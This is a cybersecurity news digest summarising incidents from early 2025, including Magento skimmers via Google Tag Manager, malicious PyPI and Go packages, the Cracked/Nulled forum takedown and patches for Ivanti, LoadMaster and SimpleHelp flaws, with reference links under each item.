Pierluigi Paganini@securityaffairs.com - 19d
Hackers are exploiting Google Tag Manager (GTM) to deploy credit card skimmers on Magento-based e-commerce websites. According to reports from The Hacker News, Sucuri, and CISO2CISO, malicious actors are leveraging GTM to deliver malware that targets sensitive payment data. The attack involves injecting code that appears to be a standard GTM or Google Analytics script but contains an obfuscated backdoor. This allows the attackers to gain persistent access to the websites.
Sucuri's investigation into a customer's Magento site revealed that credit card details were being stolen via a skimmer loaded from the cms_block.content database table. The GTM tag contained encoded JavaScript designed to collect and transmit sensitive user data entered during the checkout process to a remote server controlled by the attackers. This highlights the importance of securing third-party integrations and regularly monitoring website files for any suspicious code.
Recommended read:
References :
- Sucuri Blog: Sucuri warns of credit card data theft from website.
- ciso2ciso.com: Hackers Exploit Google Tag Manager
- The Hacker News: The Hacker News reports on hackers exploiting Google Tag Manager to deploy credit card skimmers.
- : Sucuri : Title is straightforward: Sucuri warns of credit card data theft from a customer's Magento-based eCommerce website. The credit card skimmer malware is delivered by leveraging Google Tag Manager (GTM). GTM is a free tool from Google that allows website owners to manage and deploy marketing tags on their website without needing to modify the site’s code directly.
- ciso2ciso.com: Hackers Exploit Google Tag Manager to Deploy Credit Card Skimmers on Magento Stores – Source:thehackernews.com
- securityaffairs.com: Sucuri researchers observed threat actors leveraging Google Tag Manager (GTM) to install e-skimmer software on Magento-based e-stores.
- Security Intelligence: Threat actors have been observed leveraging Google Tag Manager (GTM) to deliver credit card skimmer malware targeting Magento-based e-commerce websites.
- www.scworld.com: Magento stores compromised with Google Tag Manager skimmer
- gbhackers.com: Information on hackers exploiting Google Tag Manager to steal credit card data from e-commerce sites.
- securityonline.info: SecurityOnline article on hackers exploiting Google Tag Manager.
- gbhackers.com: Hackers Exploiting Google Tag Managers to Steal Credit Card from eCommerce Sites
- securityonline.info: Hackers Exploit Google Tag Manager to Steal Credit Card Data from Magento Sites
- Sucuri Blog: Recently, we had a client come to us concerned that their website was infected with credit card stealing malware, often referred to as MageCart. Their website was running on Magento, a popular eCommerce content management system that skilled attackers often target to steal as many credit card numbers as possible.
- Search Engine Journal: Hackers Use Google Tag Manager to Steal Credit Card Numbers
- www.searchenginejournal.com: Hackers Use Google Tag Manager to Steal Credit Card Numbers
@Talkback Resources - 2d
Millions of WordPress websites face potential script injection attacks due to a critical vulnerability found in the Essential Addons for Elementor plugin, which is installed on over 2 million sites. The flaw, identified as CVE-2025-24752 with a high severity score of 7.1, allows attackers to execute reflected cross-site scripting (XSS) attacks. This is achieved by exploiting insufficient input sanitization within the plugin's password reset functionality, specifically through malicious URL parameters.
A fake WordPress plugin has also been discovered injecting casino spam, impacting website SEO. In a separate incident, cybersecurity researchers have flagged a malicious Python library on the PyPI repository, named 'automslc', which facilitates over 100,000 unauthorized music downloads from Deezer. The package bypasses Deezer's API restrictions by embedding hardcoded credentials and communicating with an external command-and-control server, effectively turning user systems into a botnet for music piracy.
Recommended read:
References :
- bsky.app: Socket Security has discovered a malicious PyPI package that created a botnet to pirate songs from music streaming service Deezer The package was named automslc and had been downloaded over 100,000 since its release in 2019
- BleepingComputer: A malicious PyPi package named 'automslc'Â has been downloaded over 100,000 times from the Python Package Index since 2019, abusing hard-coded credentials to pirate music from the Deezer streaming service.
- Talkback Resources: Malicious PyPI Package "automslc" Enables 104K+ Unauthorized Deezer Music Downloads [app] [mal]
- socket.dev: Malicious PyPI Package Exploits Deezer API for Coordinated Music Piracy
- bsky.app: A malicious PyPi package named 'automslc'Â has been downloaded over 100,000 times from the Python Package Index since 2019, abusing hard-coded credentials to pirate music from the Deezer streaming service.
- The Hacker News: Malicious PyPI Package "automslc" Enables 104K+ Unauthorized Deezer Music Downloads
- Sucuri Blog: Injecting malware via a fake WordPress plugin has been a common tactic of attackers for some time. This clever method is often used to bypass detection as attackers exploit the fact that plugins are not part of the core files of a WordPress site, making integrity checks more difficult.
- gbhackers.com: A critical security vulnerability in the Essential Addons for Elementor plugin, installed on over 2 million WordPress websites, has exposed sites to script injection attacks via malicious URL parameters. The flaw, tracked as CVE-2025-24752 and scoring 7.1 (High) on the CVSS scale, allowed attackers to execute reflected cross-site scripting (XSS) attacks by exploiting insufficient input sanitization in the plugin’s password reset
- bsky.app: Microsoft has removed two popular VSCode extensions, 'Material Theme - Free' and 'Material Theme Icons - Free,' from the Visual Studio Marketplace for allegedly containing malicious code.
- gbhackers.com: VS Code Extension with 9 Million Installs Attacks Developers with Malicious Code
- aboutdfir.com: VSCode extensions with 9 million installs pulled over security risks
- bsky.app: Microsoft has removed two VSCode theme extensions from the VSCode Marketplace for containing malicious code.
- Techzine Global: Visual Studio Code extensions with 9 million downloads removed for security risks
@www.bleepingcomputer.com - 29d
Operation Talent, a large-scale international law enforcement effort, has successfully dismantled two major cybercrime forums, Cracked and Nulled. These platforms, with a combined user base exceeding 9 million, were hubs for the distribution of illegal goods, including stolen data, malware, and hacking tools. The operation, led by German authorities with the cooperation of eight countries, involved the seizure of 12 domains, 17 servers, over 50 electronic devices, and approximately €300,000 in cash and cryptocurrencies. Two individuals were arrested in Spain and are believed to be the main operators of both forums and related services.
The takedown of Cracked and Nulled, executed between January 28th and 30th, also targeted associated services like Sellix, a payment processor used by Cracked, and StarkRDP, a hosting service promoted on both platforms. Investigators estimate that the suspects generated around €1 million in criminal proceeds through these illegal activities. Europol played a key role, providing forensic and analytical support to the authorities. The collaborative effort highlights the growing threat of “cybercrime-as-a-service”, where readily available tools and infrastructure are used to launch attacks by those with varying levels of technical knowledge.
Recommended read:
References :
- ciso2ciso.com: International Operation Dismantles Cracked and Nulled Cybercrime Hubs – Source: www.infosecurity-magazine.com
- www.bleepingcomputer.com: Police seizes Cracked and Nulled hacking forum servers, arrests suspects
- www.helpnetsecurity.com: Cybercrime forums Cracked and Nulled seized, operators arrested
- www.the420.in: Global Cybercrime Forums Cracked and Nulled Shut Down in International Sting Operation
- : International Operation Dismantles Cracked and Nulled Cybercrime Hubs – Source: www.infosecurity-magazine.com
- Techmeme: Europol and German law enforcement arrest two suspects and seize 17 servers to take down Cracked and Nulled, two of the largest hacking forums with 10M+ users
- securityonline.info: Europol Smashing Cybercrime Hubs: Cracked & Nulled Taken Down
- www.techmeme.com: Techmeme summarizes the news about the Europol takedown of Cracked and Nulled hacking forums, citing BleepingComputer as a source.
- securityonline.info: Security Online summarizes the Europol operation that led to the takedown of Cracked and Nulled cybercrime forums.
- The Hacker News: The Hacker News reports on the authorities seizing the domains of popular hacking forums as part of a major cybercrime crackdown.
- Help Net Security: Cybercrime forums Cracked and Nulled seized, operators arrested
- hackread.com: Operation Talent: Two Arrested as Authorities Dismantle Cracked and Nulled
- cyberinsider.com: This article discusses Europol and the FBI's coordinated takedown of the large cybercrime forums, Cracked and Nulled.
- CyberInsider: In a coordinated international effort, Europol and the FBI have dismantled Cracked.io and Nulled.to, two of the world's largest cybercrime forums, seizing their domains and shutting down associated services.
- securityaffairs.com: Operation Talent: An international law enforcement operation seized Cracked, Nulled and other cybercrime websites
- socradar.io: Operation Talent: FBI Takes Down Cracked.io and Nulled.to in Global Cybercrime Crackdown
- techcrunch.com: International police coalition takes down two prolific cybercrime and hacking forums
- www.justice.gov: This website contains the latest news about cybersecurity incidents and attacks.
- BleepingComputer: Europol and German law enforcement confirmed the arrest of two suspects and the seizure of 17 servers in Operation Talent, which took down Cracked and Nulled, two of the largest hacking forums with over 10 million users.
- infosec.exchange: NEW: An international coalition of law enforcement agencies announced it has seized and taken down two prominent hacking forums with more than 10 million users. German police called Cracked and Nulled “the world’s two largest trading platforms for cybercrime.� Operation has also led to several arrests, searches of properties, as well as seizure of servers, electronic devices, cash, and cryptocurrency.
- : U.S. Department of Justice : See parent toot above for EUROPOL announcement. The U.S. DOJ finally has their own press release for the takedown of cybercrime forums Cracked and Nulled. It has substantially more information about each case, definitely worth a read.
- The420.in: Global authorities have dismantled Cracked.io and Nulled.to, two major cybercrime forums with 10M+ users.
- DataBreaches.Net: Law enforcement has been busy. As reported yesterday, Cracked and Nulled forums were seized along with services associated with them financially.
- thecyberexpress.com: This website provides cybersecurity news and updates on various attacks.
Eduard Kovacs@SecurityWeek - 23d
Spanish authorities have arrested a hacker in Alicante for allegedly conducting over 40 cyberattacks targeting critical public and private organizations, including NATO, the US Army, and various Spanish entities such as the Guardia Civil and the Ministry of Defense. The investigation began in early 2024 after a data leak was reported from a Madrid business association, revealing that the hacker was boasting about stolen information on an underground criminal forum, even defacing the victim's website.
The suspect, known online as "Natohub" among other pseudonyms, is accused of illegally accessing computer systems, disclosing secrets, damaging computers, and money laundering. Police seized multiple computers, electronic devices, and over 50 cryptocurrency accounts containing various digital assets. Although the suspect's name hasn't been released by police, local news reports identify him as an 18-year-old man.
Recommended read:
References :
- BleepingComputer: The Spanish police have arrested a suspected hacker in Alicante for allegedly conducting 40 cyberattacks targeting critical public and private organizations, including the Guardia Civil, the Ministry of Defense, NATO, the US Army, and various universities.
- securityaffairs.com: Spanish Police arrested an unnamed hacker who allegedly breached tens of government institutions in Spain and the US.
- BleepingComputer: The Spanish police have arrested a suspected hacker in Alicante for allegedly conducting 40 cyberattacks targeting critical public and private organizations, including the Guardia Civil, the Ministry of Defense, NATO, the US Army, and various universities.
- Help Net Security: Suspected NATO, UN, US Army hacker arrested in Spain
- SecurityWeek: Spanish authorities have arrested an individual who allegedly hacked several high-profile organizations, including NATO and the US army.
- : The Spanish National Police and the Civil Guard announced the arrest (and release) of a hacker responsible for the cyberattacks against various Spanish government organizations, NATO and U.S. Army databases, and other international companies and entities.
- www.scworld.com: Suspected hacker arrested for attacks on NATO, US Army
- CyberInsider: Police Arrest Hacker Behind Attacks on U.S. and NATO Systems
- cyberinsider.com: Police Arrest Hacker Behind Attacks on U.S. and NATO Systems
- www.bleepingcomputer.com: Spanish National Police : (Spanish language) The Spanish National Police and the Civil Guard announced the arrest (and release) of a hacker responsible for the cyberattacks against various Spanish government organizations, NATO and U.S. Army databases, and other international companies and entities. Police seized multiple computers, electronic devices, and 50 cryptocurrency accounts containing various digital assets. Although no identity was released, linked the victim organizations to high profile attacks by the hacker using the alias "natohub".
- www.helpnetsecurity.com: Suspected NATO, UN, US Army hacker arrested in Spain
- www.securityweek.com: SecurityWeek provides details on the hacker's arrest and the organizations targeted.
- BleepingComputer: The Spanish police have arrested a suspected hacker in Alicante for allegedly conducting 40 cyberattacks targeting critical public and private organizations, including the Guardia Civil, the Ministry of Defense, NATO, the US Army, and various universities.
- bsky.app: The Spanish police have arrested a suspected hacker in Alicante
for allegedly conducting 40 cyberattacks targeting critical public and private organizations, including the Guardia Civil, the Ministry of Defense, NATO, the US Army, and various universities. https://www.bleepingcomputer.com/news/legal/spain-arrests-suspected-hacker-of-us-and-spanish-military-agencies/
- Cybernews: An undisclosed hacker has been accused of over 40 cyberattacks on strategic organizations, including government, universities, NATO, and the US Army.
- www.policia.es: Spanish National Police : (Spanish language) The Spanish National Police and the Civil Guard announced the arrest (and release) of a hacker responsible for the cyberattacks against various Spanish government organizations, NATO and U.S. Army databases, and other international companies and entities.
- Techmeme: Spanish police arrest a hacker for allegedly conducting 40 cyberattacks on critical public and private organizations, seizing 50 crypto accounts, PCs, and more
- BleepingComputer: The Spanish police have arrested a suspected hacker in Alicante for allegedly conducting 40 cyberattacks targeting critical public and private organizations, including the Guardia Civil, the Ministry of Defense, NATO, the US Army, and various universities.
- www.techmeme.com: Spanish police arrest a hacker for allegedly conducting 40 cyberattacks on critical public and private organizations, seizing 50 crypto accounts, PCs, and more
- ciso2ciso.com: Police arrest teenager suspected of hacking NATO and numerous Spanish institutions
- gbhackers.com: Authorities Arrested Hacker Who Compromised 40+ Organizations
- www.helpnetsecurity.com: The Spanish National Police has arrested a hacker suspected of having breached national and international agencies (including the United Nation’s International Civil Aviation Organization and NATO), Spanish universities and companies, and released stolen data on the dark web.
@www.chainalysis.com - 23d
Ransomware payments experienced a significant decline in 2024, dropping by 35% to approximately $813.55 million, according to a report by Chainalysis. This marks a notable decrease from the record $1.25 billion paid in 2023. The decline reflects a growing trend of victims refusing to pay extortion demands, despite ransomware gangs posting more victims on leak sites. The shift suggests that organizations are becoming more resilient to ransomware attacks, possibly due to enhanced data recovery strategies and the impact of increased law enforcement interventions.
The surprising decrease in payments, particularly in the second half of 2024, signals a potential change in the ransomware landscape. Crypto forensics firm Chainalysis noted that sums demanded by cyber gangs in the second half of 2024 were 53% higher than actual payouts. Law enforcement actions, including disruptions to prolific ransomware gangs like LockBit and improved international collaboration, are also contributing to this downturn. This indicates a shift in the financial dynamics of ransomware operations.
Recommended read:
References :
- Carly Page: Ransomware payments fell by more than one-third in 2024 as an increasing number of victims refused to negotiate with hackers
- techcrunch.com: Ransomware payments fell by more than one-third in 2024 as an increasing number of victims refused to negotiate with hackers.
- Help Net Security: Ransomware payments plummet as more victims refuse to pay
- techcrunch.com: TechCrunch covers Chainalysis' report on the decline in ransomware payments.
- www.chainalysis.com: Chainalysis' blog post presents their full analysis of the cryptocurrency crime trends in 2024.
- www.cybersecurity-insiders.com: Good news as ransomware pay fell by 35 percent in 2024
- www.helpnetsecurity.com: Ransomware payments plummet as more victims refuse to pay
- Ars OpenForum: Amount paid by victims to hackers declined by hundreds of millions of dollars.
- Techmeme: In 2024, ransomware attackers received ~$813.55M in payments from victims, down 35% on 2023's record $1.25B, as more victims refused to pay (Chainalysis)
- arstechnica.com: Amount paid by victims to hackers declined by hundreds of millions of dollars.
- www.cybersecurity-insiders.com: Good news as ransomware pay fell by 35 percent in 2024
- Moonshot News: Ransomware payments have changed dramatically
- moonshot.news: Ransomware payments fell 35% in 2024 from 2023 record-breaking $1.25 billion down to $813.55 million, marking the first revenue decline since 2022, US blockchain data platform Chainalysis reports.
- www.techmeme.com: In 2024, ransomware attackers received ~$813.55M in payments from victims, down 35% on 2023's record $1.25B, as more victims refused to pay
- cyberscoop.com: CyberScoop reports that ransomware payments dropped 35% in 2024.
- Blog: Field Effect reports on the decline in ransomware payments and increase in attack frequency.
- securityboulevard.com: Law enforcement actions, better defenses, and a refusal by victims to pay helped to reduce the amount of ransoms paid in 2024 by $35%, a sharp decline from the record $1.25 billion shelled out in 2023, according to researchers with Chainalysis.
- www.heise.de: Various measures against cybercriminals have once again shown success in 2024: Ransom payments following ransomware attacks have fallen again.
- Security Boulevard: Security Boulevard article on ransomware payments falling 35% in 2024.
- cyberpress.org: Cyberpress reports on ransomware payments plummeting in 2024.
- TechInformed: TechInformed reports on ransomware payments plummeting in 2024.
Jeff Burt@DevOps.com - 25d
A malicious package imitating the popular BoltDB module has been discovered in the Go ecosystem. This package contains a backdoor that enables remote code execution, posing a significant security risk to developers using the compromised module. The malicious package, a typosquat of BoltDB, was discovered by researchers at Socket, an application security company.
This attack exploits the Go Module Mirror's caching mechanism, allowing the malware to persist undetected despite manual code reviews. After the malware was cached by the Go Module Mirror, the git tag was strategically altered on GitHub to remove traces of malicious code and hide it from manual review. To mitigate software supply-chain threats, Socket advises developers to verify package integrity before installation, analyze dependencies for anomalies, and use security tools that inspect installed code at a deeper level.
Recommended read:
References :
- ciso2ciso.com: Source: thehackernews.com – Author: . Cybersecurity researchers have called attention to a software supply chain attack targeting the Go ecosystem that involves a malicious package capable of granting the adversary remote access to infected systems.
- lobste.rs: Go Supply Chain Attack: Malicious Package Exploits Go Module Proxy Caching for Persistence
- The Hacker News: Malicious Go Package Exploits Module Mirror Caching for Persistent Remote Access
- bsky.app: Socket Security has discovered a malicious Go module for the BoltDB database that contains a hidden backdoor. The module is cached in the Go Module Mirror, the first attack documented making it in the the Go Module Mirror despite manual code reviews. https://socket.dev/blog/malicious-package-exploits-go-module-proxy-caching-for-persistence
- ciso2ciso.com: Malicious Go Package Exploits Module Mirror Caching for Persistent Remote Access
- fosstodon.org: Socket: Go Supply Chain Attack: Malicious Package Exploits Go Module Proxy Caching for Persistence
- DevOps.com: Typosquat Supply Chain Attack Targets Go Developers
- securityonline.info: Socket researchers have discovered a malicious typosquatting package in the Go ecosystem that exploits the Go Module Proxy’s
- securityonline.info: Socket researchers have discovered a malicious typosquatting package in the Go ecosystem that exploits the Go Module Proxy’s The post appeared first on .
- www.infoworld.com: Malicious package found in the Go ecosystem
- ciso2ciso.com: Malicious package found in the Go ecosystem – Source: www.infoworld.com
- ciso2ciso.com: Source: www.infoworld.com – Author: The malicious package, a typosquat of the popular BoltDB module, is said to be among the first known exploits of the Go Module Mirror’s indefinite module caching.
- heise online English: Typosquatting in the Go ecosystem: Fake BoltDB package discovered A malicious package in the Go ecosystem imitates BoltDB and contains a backdoor. Attackers used the caching service to spread the malware unnoticed.
- www.heise.de: Typosquatting in the Go ecosystem: Fake BoltDB package discovered
info@thehackernews.com (The Hacker News)@The Hacker News - 17d
Ivanti has released critical security updates for Connect Secure (ICS), Policy Secure (IPS), and Secure Access Client (ISAC) to address multiple vulnerabilities. These include three critical severity problems that could allow remote code execution (RCE), posing a significant risk. The updates aim to patch flaws such as external control of a file name (CVE-2024-38657) and a stack-based buffer overflow (CVE-2025-22467), which can be exploited by authenticated attackers to execute arbitrary code and compromise system integrity.
The specific vulnerabilities addressed include CVE-2024-38657, which allows remote authenticated attackers with admin privileges to write arbitrary files, and CVE-2025-22467, a stack-based buffer overflow that enables remote code execution. Also patched is CVE-2024-10644 which is a code injection vulnerability, and CVE-2024-47908, an operating system command injection flaw in the admin web console of Ivanti CSA. Users are urged to update to the latest versions, Ivanti Connect Secure 22.7R2.6, Ivanti Policy Secure 22.7R1.3, and Ivanti CSA 5.0.5, as soon as possible to mitigate potential exploitation. While Ivanti is not aware of active exploitation, it's imperative to apply the patches due to the history of Ivanti appliances being weaponized.
Recommended read:
References :
- Vulnerability-Lookup: Security advisory for Ivanti Connect Secure, Policy Secure, and Secure Access Client (multiple CVEs).
- securityonline.info: Ivanti has disclosed multiple vulnerabilities affecting its Connect Secure, Policy Secure, and Secure Access Client products, with some The post appeared first on .
- The Hacker News: Ivanti Patches Critical Flaws in Connect Secure and Policy Secure – Update Now
- BleepingComputer: Ivanti has released security updates for Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS), and Ivanti Secure Access Client (ISAC) to address multiple vulnerabilities, including three critical severity problems.
- securityonline.info: CVE-2025-22467 (CVSS 9.9): Ivanti Connect Secure Vulnerability Allows Remote Code Execution
- www.bleepingcomputer.com: Ivanti has released security updates for Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS), and Ivanti Secure Access Client (ISAC) to address multiple vulnerabilities, including three critical severity problems.
- vulnerability.circl.lu: February Security Advisory Ivanti Connect Secure (ICS),Ivanti Policy Secure (IPS) and Ivanti Secure Access Client (ISAC) (Multiple CVEs), has been published on Vulnerability-Lookup
- research.kudelskisecurity.com: Ivanti ICS, IPS, ISAC, CSA: Multiple Vulnerabilities Disclosed and Patched
- bsky.app: Ivanti has released security updates for Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS), and Ivanti Secure Access Client (ISAC) to address multiple vulnerabilities, including three critical severity problems.
- socradar.io: Ivanti Security Update Addresses Severe Vulnerabilities in ICS, IPS, and ISAC (CVE-2025-22467, CVE-2024-38657, CVE-2024-10644)
- research.kudelskisecurity.com: Ivanti ICS, IPS, ISAC, CSA: Multiple Vulnerabilities Disclosed and Patched
- BleepingComputer: Ivanti has released security updates for Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS), and Ivanti Secure Access Client (ISAC) to address multiple vulnerabilities, including three critical severity problems
@www.bleepingcomputer.com - 21d
Hackers are actively exploiting vulnerabilities in SimpleHelp Remote Monitoring and Management (RMM) software to compromise systems and potentially deploy ransomware. Cybersecurity firm Field Effect has confirmed these exploits and released a report detailing the post-exploitation activity. The vulnerabilities, tracked as CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728, allow attackers to create administrator accounts and drop backdoors, laying the groundwork for further malicious activities.
Field Effect identified a breach where threat actors exploited these vulnerabilities in the SimpleHelp RMM client to infiltrate a targeted network. Following initial access, attackers execute discovery commands to gather system and network data. They then establish persistence by creating new administrator accounts and deploying the Sliver malware, a post-exploitation framework gaining popularity as a Cobalt Strike alternative. Once deployed, Sliver waits for further commands, enabling attackers to compromise the domain controller and potentially distribute malicious software.
Recommended read:
References :
- Security Risk Advisors: Threat Actors Exploit SimpleHelp RMM Vulnerabilities to Deploy Ransomware
- The Hacker News: The Hacker News - Hackers Exploiting SimpleHelp RMM Flaws for Persistent Access and Ransomware
- www.bleepingcomputer.com: Hackers are targeting vulnerable SimpleHelp RMM clients to create administrator accounts, drop backdoors, and potentially lay the groundwork for ransomware attacks.
- Blog: Threat actors exploiting #SimpleHelp RMM #vulnerabilities to deploy #ransomware The post appeared first on .
- www.scworld.com: Sliver malware spread via SimpleHelp RMM exploits
- fieldeffect.com: Threat actors exploiting #SimpleHelp RMM #vulnerabilities to deploy #ransomware
- gbhackers.com: Hackers Exploiting SimpleHelp Vulnerabilities to Deploy Malware on Systems
- gbhackers.com: Hackers Exploiting SimpleHelp Vulnerabilities to Deploy Malware on Systems
@ciso2ciso.com - 30d
A series of cyber incidents have been reported, highlighting the evolving nature of online threats. A concerning trend involves a sophisticated phishing campaign targeting users in Poland and Germany, using PureCrypter malware to deliver multiple payloads, including Agent Tesla and Snake Keylogger, as well as a novel backdoor called TorNet. This TorNet backdoor employs advanced detection evasion tactics, requiring immediate and proactive defense measures. The campaign, which has been active since at least mid-summer 2024, indicates financially motivated threat actors behind the attacks. Security tools are available with threat intelligence to assist in detecting and preventing such intrusions.
Multiple additional vulnerabilities have been discovered, including over 10,000 WordPress websites unknowingly delivering MacOS and Windows malware through fake Google browser update pages. This cross-platform malware attack is notable as it delivers AMOS for Apple users and SocGholish for Windows users, and is the first time these variants have been delivered through a client-side attack. Moreover, an OAuth redirect flaw in an airline travel integration system has exposed millions of users to account hijacking. By manipulating parameters within the login process, attackers can redirect authentication responses, gain unauthorized access to user accounts, and perform actions like booking hotels and car rentals. These incidents underscore the importance of constant vigilance and robust security measures across all platforms.
Recommended read:
References :
- BleepingComputer: Hackers are believed to be exploiting recently fixed SimpleHelp Remote Monitoring and Management (RMM) software vulnerabilities to gain initial access to target networks.
- securityaffairs.com: Attackers exploit SimpleHelp RMM software flaws for initial access.
- Help Net Security: Attackers are leveraging vulnerabilities in SimpleHelp.
- www.bleepingcomputer.com: Hackers are exploiting flaws in SimpleHelp RMM to breach networks
- ciso2ciso.com: TorNet Backdoor Detection: An Ongoing Phishing Email Campaign Uses PureCrypter Malware to Drop Other Payloads – Source: socprime.com
- cside.dev: 10,000 WordPress Websites Found Delivering MacOS and Microsoft Malware
- The Hacker News: OAuth Redirect Flaw in Airline Travel Integration Exposes Millions to Account Hijacking
Pierluigi Paganini@securityaffairs.com - 33d
Multiple vulnerabilities have been discovered in Git and its related tools, posing a risk to user credentials. These flaws stem from the improper handling of message delimiters within the Git Credential Protocol, impacting tools such as GitHub Desktop, Git Credential Manager, Git LFS, GitHub CLI, and GitHub Codespaces. This improper handling allows malicious actors to craft URLs with injected carriage return or newline characters, leading to credential leaks. Specifically, vulnerabilities like CVE-2025-23040 in GitHub Desktop allowed for 'carriage return smuggling' through crafted submodule URLs.
These vulnerabilities arise from differences between Git's strict protocol handling and the implementation of related projects. Git Credential Manager is vulnerable due to the StreamReader class, misinterpreting line-endings, while Git LFS is vulnerable by not checking for embedded control characters, allowing for the injection of carriage return line feeds via crafted HTTP URLs. A new configuration setting, `credential.protectProtocol`, has been introduced to help mitigate these vulnerabilities by providing a defense-in-depth approach.
Recommended read:
References :
- Cyber Security News: Critical GitHub Flaw Allows Credential Leaks Through Malicious Repos
- securityaffairs.com: Multiple Git flaws led to credentials compromise
- The Hacker News: GitHub Desktop Vulnerability Risks Credential Leaks via Malicious Remote URLs
- cyberpress.org: Critical GitHub Flaw Allows Credential Leaks Through Malicious Repos
- ciso2ciso.com: Multiple Git flaws led to credentials compromise – Source: securityaffairs.com
- ciso2ciso.com: Multiple security vulnerabilities have been disclosed in GitHub Desktop as well as other Git-related projects that, if successfully exploited, could permit an attacker to gain unauthorized access to a user’s Git credentials. “Git implements a protocol called Git Credential Protocol to retrieve credentials from the credential helper,� GMO Flatt Security […] La entrada se publicó primero en .
- ciso2ciso.com: GitHub Desktop Vulnerability Risks Credential Leaks via Malicious Remote URLs – Source:thehackernews.com
- discuss.privacyguides.net: GitHub Desktop Vulnerability Risks Credential Leaks via Malicious Remote URLs
- : Multiple Git flaws led to credentials compromise – Source: securityaffairs.com
- Dataconomy: Clone2Leak exposes credential risks in Git ecosystem
- BleepingComputer: A set of three distinct but related attacks, dubbed 'Clone2Leak,' can leak credentials by exploiting how Git and its credential helpers handle authentication requests.
- www.bleepingcomputer.com: News about Clone2Leak vulnerabilities in the Git ecosystem.
@securityonline.info - 18d
Progress Software has released patches to address multiple high-severity vulnerabilities in its LoadMaster software. These flaws could allow remote, authenticated attackers to execute arbitrary system commands on affected systems. The vulnerabilities stem from improper input validation, where attackers who gain access to the management interface can inject malicious commands via crafted HTTP requests.
The affected software includes LoadMaster versions from 7.2.48.12 and prior, 7.2.49.0 to 7.2.54.12 (inclusive), and 7.2.55.0 to 7.2.60.1 (inclusive), as well as Multi-Tenant LoadMaster version 7.1.35.12 and prior. Progress Software has implemented input sanitization to mitigate these vulnerabilities, preventing arbitrary system commands from being executed. Users are advised to update to the latest patched versions to ensure the security of their systems.
Recommended read:
References :
- community.progress.com: Progress security advisory "05" February 2024: (8.4 high) Improper Input Validation vulnerability of Authenticated User in Progress LoadMaster allows : OS Command Injection (8.4 high) Improper Input Validation vulnerability of Authenticated User in Progress LoadMaster allows : OS Command Injection (8.4 high) Improper Input Validation vulnerability of Authenticated User in Progress LoadMaster allows : OS Command Injection (8.4 high) Improper Input Validation vulnerability of Authenticated User in Progress LoadMaster allows : OS Command Injection Remote malicious actors who gain access to the management interface of LoadMaster and successfully authenticate could issue a carefully crafted HTTP request that allows arbitrary system commands to be executed. This vulnerability has been closed by sanitizing request user input to mitigate arbitrary system commands being executed.   We have not received any reports that these vulnerabilities have been exploited and we are not aware of any direct impact on customers.
- securityaffairs.com: Progress Software fixed multiple high-severity LoadMaster flaws - SecurityAffairs
- securityonline.info: Progress LoadMaster Security Update: Multiple Vulnerabilities Addressed - SecurityOnline
- The Hacker News: Progress Software Patches High-Severity LoadMaster Flaws Affecting Multiple Versions - The Hacker News
- securityonline.info: Security Online Article about Progress LoadMaster Security Update
- : Progress security advisory "05" February 2024: (8.4 high) Improper Input Validation vulnerability of Authenticated User in Progress LoadMaster allows : OS Command Injection
@www.bleepingcomputer.com - 9d
Chinese APT groups are actively targeting U.S. telecom providers and European healthcare organizations using sophisticated cyberattacks. The attacks involve custom malware, such as JumbledPath used by Salt Typhoon to spy on U.S. telecom networks, and the exploitation of vulnerabilities like the Check Point flaw (CVE-2024-24919). These campaigns are characterized by the deployment of advanced tools like ShadowPad and NailaoLocker ransomware, indicating a blend of espionage and financially-motivated cybercrime.
These threat actors gain initial access through exploited vulnerabilities, then move laterally within the networks using techniques like RDP to obtain elevated privileges. The attackers then deploy ShadowPad and PlugX, before deploying the NailaoLocker ransomware in the final stages, encrypting files and demanding Bitcoin payments. These findings highlight the evolving tactics of Chinese APT groups and the challenges in attributing these attacks, given the blurring lines between state-sponsored espionage and financially driven operations.
Recommended read:
References :
- securityaffairs.com: Salt Typhoon used custom malware JumbledPath to spy U.S. telecom providers
- The Hacker News: Chinese-Linked Attackers Exploit Check Point Flaw to Deploy ShadowPad and Ransomware
- www.bleepingcomputer.com: Salt Typhoon uses JumbledPath malware to spy on US telecom networks
@www.bleepingcomputer.com - 20d
The North Korean hacking group Kimsuky has been observed using a custom-built RDP Wrapper and proxy tools in recent cyber espionage campaigns. According to reports from the AhnLab Security Intelligence Center (ASEC), these tools enable the group to directly access infected machines and maintain persistent access, representing a shift in tactics from relying solely on noisy backdoors like PebbleDash. The group also utilizes the forceCopy stealer malware.
Kimsuky's attack strategy typically begins with spear-phishing emails containing malicious shortcut (.LNK) files disguised as legitimate documents. When opened, these files execute PowerShell or Mshta scripts to download malware, including the custom RDP Wrapper. This wrapper is designed to bypass security measures by modifying export functions, making it difficult for security tools to detect. The group also uses keyloggers to capture user keystrokes and proxy malware to bypass network restrictions, facilitating remote access to compromised systems even within private networks.
Recommended read:
References :
- ciso2ciso.com: Kimsuky APT group used custom RDP Wrapper version and forceCopy stealer – Source: securityaffairs.com
- securityaffairs.com: Kimsuky APT group used custom RDP Wrapper version and forceCopy stealer.
- securityonline.info: Kimsuky Group Leverages RDP Wrapper for Persistent Cyber Espionage.
- www.bleepingcomputer.com: Kimsuky hackers use new custom RDP wrapper for remote access.
- www.microsoft.com: Microsoft details Kimsuky's new PowerShell-based attack tactic.
- www.scworld.com: PowerShell exploited in new Kimsuky intrusions
Pierluigi Paganini@Security Affairs - 26d
A web skimming campaign has targeted multiple websites, including Casio UK, in a sophisticated double-entry attack. Security firm Jscrambler discovered that at least 17 websites were compromised, with the attack on Casio UK lasting from January 14th to January 24th. The threat actor installed a web skimmer on all pages except the checkout page. This skimmer altered the usual payment flow, manipulating the user into entering sensitive information such as name, address, email, phone number, and credit card details into a fake payment form.
The double-entry technique involved an unobfuscated loader that fetched a second-stage skimmer from an attacker-controlled server. This skimmer encrypted and exfiltrated sensitive customer information, including contact information, credit card details, and billing addresses, concealing malicious activity through XOR-based string masking and custom encoding. After completing the fake form, victims were redirected to the legitimate checkout page, where they were asked to fill out the same details again. Jscrambler noted that Casio UK's website had a content security policy set to report-only, which logged events but failed to prevent the attack.
Recommended read:
References :
- securityaffairs.com: Web Skimmer found on at least 17 websites, including Casio UK
- www.scworld.com: Web skimming campaign hits several websites
- ciso2ciso.com: Casio Website Infected With Skimmer – Source: www.securityweek.com
